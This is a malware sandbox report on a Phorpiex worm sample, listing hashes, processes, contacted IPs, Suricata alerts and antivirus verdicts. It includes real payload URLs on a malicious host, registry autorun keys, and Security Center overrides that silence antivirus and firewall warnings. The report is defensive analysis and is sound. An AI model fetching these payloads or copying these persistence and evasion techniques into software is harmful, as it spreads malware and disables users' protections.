Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 4, 2021, 1:46 p.m.	May 4, 2021, 1:48 p.m.

Size	6.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`0a6569e45a3a38f7168f4c4aa0594627`
SHA256	`ad74f606e358fb7f6db9a5652d0a60310d069ac108934a72d0352e5fa9248b38`
CRC32	`510E4B74`
ssdeep	`96:L1YtYF8d/XFvRxR2xs9it95PtboynunSzCt4:L12jWbr5P1oynWSq`
PDB Path	C b
Yara	Win_Worm_Phorpiex - a worm which spreads via removable drives and network drives. PE_Header_Zero - PE File Signature IsPE32 - (no description)

46.exe "C:\Users\test22\AppData\Local\Temp\46.exe"
1868
- 12752.exe C:\Users\test22\AppData\Local\Temp\12752.exe
  2852
  - lsass.exe C:\256811963426906\lsass.exe
    1452

Name	Response	Post-Analysis Lookup
api.wipmania.com	A 212.83.168.196	212.83.168.196

IP Address	Status	Action
131.188.40.189	Active	Moloch
141.255.162.34	Active	Moloch
149.56.45.200	Active	Moloch
164.124.101.2	Active	Moloch
185.215.113.93	Active	Moloch
212.83.168.196	Active	Moloch
45.66.156.176	Active	Moloch
5.196.71.24	Active	Moloch
51.195.253.209	Active	Moloch
83.212.103.129	Active	Moloch
86.59.21.38	Active	Moloch
95.217.42.50	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.93:80 -> 192.168.56.101:49200	2400023	ET DROP Spamhaus DROP Listed Traffic Inbound group 24	Misc Attack
TCP 192.168.56.101:49207 -> 212.83.168.196:80	2014304	ET POLICY External IP Lookup Attempt To Wipmania	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49200 -> 185.215.113.93:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 149.56.45.200:9030 -> 192.168.56.101:49216	2522180	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 181	Misc Attack
TCP 192.168.56.101:49216 -> 149.56.45.200:9030	2002950	ET P2P TOR 1.0 Server Key Retrieval	Potential Corporate Privacy Violation
TCP 86.59.21.38:80 -> 192.168.56.101:49212	2522742	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 743	Misc Attack
TCP 45.66.156.176:8443 -> 192.168.56.101:49213	2522577	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 578	Misc Attack
TCP 185.215.113.93:80 -> 192.168.56.101:49200	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49216 -> 149.56.45.200:9030	2221001	SURICATA HTTP gzip decompression failed	Generic Protocol Command Decode
TCP 185.215.113.93:80 -> 192.168.56.101:49200	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 86.59.21.38:80	2221001	SURICATA HTTP gzip decompression failed	Generic Protocol Command Decode
TCP 192.168.56.101:49216 -> 149.56.45.200:9030	2008113	ET P2P Tor Get Server Request	Potential Corporate Privacy Violation
TCP 192.168.56.101:49212 -> 86.59.21.38:80	2028914	ET POLICY TOR Consensus Data Requested	Potential Corporate Privacy Violation
TCP 149.56.45.200:9030 -> 192.168.56.101:49216	2221001	SURICATA HTTP gzip decompression failed	Generic Protocol Command Decode
TCP 86.59.21.38:80 -> 192.168.56.101:49212	2221001	SURICATA HTTP gzip decompression failed	Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 212.83.168.196:80	2014304	ET POLICY External IP Lookup Attempt To Wipmania	Device Retrieving External IP Address Detected
TCP 51.195.253.209:9001 -> 192.168.56.101:49218	2522623	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 624	Misc Attack
TCP 192.168.56.101:49218 -> 51.195.253.209:9001	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 5.196.71.24:9001 -> 192.168.56.101:49217	2522640	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 641	Misc Attack
TCP 192.168.56.101:49217 -> 5.196.71.24:9001	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 83.212.103.129:44933 -> 192.168.56.101:49219	2522722	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 723	Misc Attack
TCP 192.168.56.101:49219 -> 83.212.103.129:44933	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 83.212.103.129:44933 -> 192.168.56.101:49219	2018789	ET POLICY TLS possible TOR SSL traffic	Misc activity
TCP 131.188.40.189:443 -> 192.168.56.101:49215	2522139	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 140	Misc Attack
TCP 192.168.56.101:49215 -> 131.188.40.189:443	2008113	ET P2P Tor Get Server Request	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49219 83.212.103.129:44933	CN=www.ftov32jlnn.com	CN=www.4yohmszal2vz7bh.net	49:b6:3f:00:11:f7:04:03:0c:a2:73:1e:c6:30:cd:24:66:bc:62:8e

This executable has a PDB path (1 event)

pdb_path

C b

The executable uses a known packer (1 event)

packer

Armadillo v1.71

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.93/pepwn.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.93/cc11
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://86.59.21.38/tor/status-vote/current/consensus.z

Performs some HTTP requests (4 events)

request	GET http://185.215.113.93/pepwn.exe
request	GET http://api.wipmania.com/
request	GET http://185.215.113.93/cc11
request	GET http://86.59.21.38/tor/status-vote/current/consensus.z

A process attempted to delay the analysis task. (1 event)

description

lsass.exe tried to sleep 221 seconds, actually delayed analysis time by 221 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\12752.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\12752.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 4, 2021, 1:48 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process 46.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile May 4, 2021, 1:46 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ö·¤DÙ÷DÙ÷DÙ÷cQ´÷GÙ÷cQ¢÷VÙ÷DØ÷ýÙ÷+Ý÷GÙ÷Ç×÷FÙ÷+Ó÷OÙ÷ZÅ]÷EÙ÷ZÅH÷EÙ÷RichDÙ÷PELQë`à 4Z*BP@à@\|vÜ°´ÀtSP.textÈ34 request_handle: 0x00cc000c	1	1	0

Connects to an IRC server, possibly part of a botnet

Communicates with host for which no DNS query was performed (10 events)

host	131.188.40.189
host	141.255.162.34
host	149.56.45.200
host	185.215.113.93
host	45.66.156.176
host	5.196.71.24
host	51.195.253.209
host	83.212.103.129
host	86.59.21.38
host	95.217.42.50

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services				reg_value	C:\256811963426906\lsass.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services				reg_value	C:\256811963426906\lsass.exe

Operates on local firewall's policies and settings (1 event)

registry

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

Network communications indicative of possible code injection originated from the process lsass.exe (9 events)

Time & API	Arguments	Status	Return
connect May 4, 2021, 1:48 p.m.	ip_address: 5.196.71.24 socket: 1804 port: 9001	1	0
send May 4, 2021, 1:48 p.m.	buffer: ZV`ÒË äîuÇ)m &#Ô2ßáÝ5æ'¹çkV%/5 ÀÀÀ À 28ÿ socket: 1804 sent: 95	1	95
connect May 4, 2021, 1:48 p.m.	ip_address: 51.195.253.209 socket: 1800 port: 9001	1	0
send May 4, 2021, 1:48 p.m.	buffer: ZV`Ò Ü+Wb~þÚÒ£o0Zè#Ibó³x@/5 ÀÀÀ À 28ÿ socket: 1800 sent: 95	1	95
connect May 4, 2021, 1:48 p.m.	ip_address: 83.212.103.129 socket: 1804 port: 44933	1	0
send May 4, 2021, 1:48 p.m.	buffer: ZV`Ò ªöD¶ËÏÙ1Z3Ú`¯Éýq)`mýÓ(/5 ÀÀÀ À 28ÿ socket: 1804 sent: 95	1	95
send May 4, 2021, 1:48 p.m.	buffer: FBAqÂ¤ bÂ1z]cûäjªÏÎk½Ù~}Ï¾ô^Ï«y5ªæÚfb:ë»ñT7¬fZÝa0L!1ðj(ûNKelR*ÓHcqp_<.kXnLÁµ{Ùînß¡ socket: 1804 sent: 134	1	134
send May 4, 2021, 1:48 p.m.	buffer: tÊEv¸ÈmR Ðì¨28EoâPyâdq3/ÓO socket: 1804 sent: 37	1	37
send May 4, 2021, 1:48 p.m.	buffer: õ§Yú+{®i1 ¤B£ç»SUÁë¥ÖÀè¦äènÒÕu@Ýí,aëA0¸ ´È6¼ÐÔLÁ:ð¦'Çç<0ù¶R @`LöÜ{Os,pj+nÍ@½ä)Ý½Þ1Áb¨çÕ_,`$»vExBvJ§´ÐIz[þÐàl«¤h°¢ãICc¦~µòÛäÖwªE0F2W1ÞÍ+Éã¬À±$×_v3Ä>NFøü~n¨\|CÂÛßV}?'BD¥`Êi¬Æ?w±Þé6¦Ef««OÁ¢»~Ã%1QWà\|sÔ¡ÆgZô!+Ú&;:Ña1=y3¹±iÑèëüÚ). ÐÅZëøÆFgâ=Émdn§Uy{´Ñ!Gp[Jus/ÙNtFRjÜö/çä-ï~ÛMÊØ¶>OÊóhUÿèÚwô;fzP6[Ñì¶iÐÎÍuYa°°+ÛlºÀ¹KðªÉ5<á¶l6ÌÄ4òç3tÏÜR½1BÄÙLÆóªö®§!±zô^#çá_¥·n35ãï±RØHúêo®E\|>ShzvZÂä³Sÿãp%Ûçoÿø¡ÝYa.ooïê!'&ôXS}£nI'®ÎLÜ¯ÇÌú£I socket: 1804 sent: 549	1	549

Modifies security center warnings (7 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride

Network activity contains more than one unique useragent (3 events)

process	46.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
process	12752.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
process	lsass.exe	useragent

Attempts to remove evidence of file being downloaded from the Internet (2 events)

file	C:\Users\test22\AppData\Local\Temp\12752.exe:Zone.Identifier
file	C:\256811963426906\lsass.exe:Zone.Identifier

Generates some ICMP traffic

Disables Windows Security features (5 events)

description	attempts to disable antivirus notifications	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
description	attempts to disable antivirus notifications	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
description	attempts to disable firewall notifications	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
description	attempts to disable firewall notifications	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
description	attempts to disable windows update notifications	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Heur.Mint.Zard.11
FireEye	Generic.mg.0a6569e45a3a38f7
ALYac	Gen:Heur.Mint.Zard.11
Cylance	Unsafe
K7AntiVirus	Trojan ( 0056d4f21 )
K7GW	Trojan ( 0056d4f21 )
Cybereason	malicious.45a3a3
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Phorpiex.AG
APEX	Malicious
Avast	Win32:CoinminerX-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Gen:Heur.Mint.Zard.11
Paloalto	generic.ml
Ad-Aware	Gen:Heur.Mint.Zard.11
Sophos	Mal/Generic-S
Comodo	TrojWare.Win32.TrojanDownloader.Agent.EQE@80vxxy
McAfee-GW-Edition	BehavesLike.Win32.Generic.xt
Emsisoft	Gen:Heur.Mint.Zard.11 (B)
SentinelOne	Static AI - Malicious PE
Avira	TR/Crypt.XPACK.Gen
MAX	malware (ai score=89)
Microsoft	Trojan:Win32/Caynamer.A!ml
GData	Gen:Heur.Mint.Zard.11
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Win32.Dlder.C3467007
Acronis	suspicious
McAfee	RDN/Generic.hbg
VBA32	BScope.Trojan.Caynamer
Malwarebytes	Worm.Phorpiex.Generic
Rising	Worm.Phorpiex!8.48D (TFE:dGZlOgUN9lLDNPuMzg)
Ikarus	Win32.Outbreak
eGambit	Unsafe.AI_Score_97%
Fortinet	W32/Phorpiex.AH!worm
BitDefenderTheta	Gen:NN.ZexaF.34686.auW@a0A3T4li
AVG	Win32:CoinminerX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	192.168.56.101:49213
dead_host	45.66.156.176:8443
dead_host	95.217.42.50:1067
dead_host	141.255.162.34:8080

46.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All